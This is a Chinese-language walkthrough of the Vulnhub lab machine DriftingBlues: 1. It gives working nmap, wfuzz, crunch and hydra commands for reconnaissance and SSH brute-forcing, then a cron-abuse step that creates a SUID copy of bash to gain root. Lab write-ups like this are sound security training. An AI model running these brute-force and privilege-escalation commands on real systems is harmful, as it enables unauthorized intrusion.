Vulnhub: DriftingBlues: 1靶机

发布时间 2023-08-25 19:16:01作者: ctostm

kali:192.168.111.111

靶机:192.168.111.215

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.215

image

80端口首页源码

image

image

访问noteforkingfish.txt,发现为Ook!加密的密文

image

解密后提示需要用户eric和修改hosts文件,解密网站:https://www.splitbrain.org/services/ook

image

网站首页中的邮件地址的域名:driftingblues.box

image

爆破子域名

wfuzz -H 'HOST: FUZZ.driftingblues.box' -u http://192.168.111.215 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hh 7710 --hc 400 -c

image

image

查看子域的robots.txt提示ssh_cred.txt

image

ssh密码为1mw4ckyyucky最后加一位数字

image

生成密码字典

crunch 13 13 -t 1mw4ckyyucky% >> pass.txt

image

利用之前提示的用户eric爆破ssh

hydra -l eric -P ./pass.txt 192.168.111.215 -s 22 ssh -t 64

image

提权

pspy64收集到定时任务

image

/var/backups/backup.sh内容

image

在/tmp目录下创建emergency文件

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' >> /tmp/emergency
chmod 777 emergency
/tmp/bash -p

image

flag

image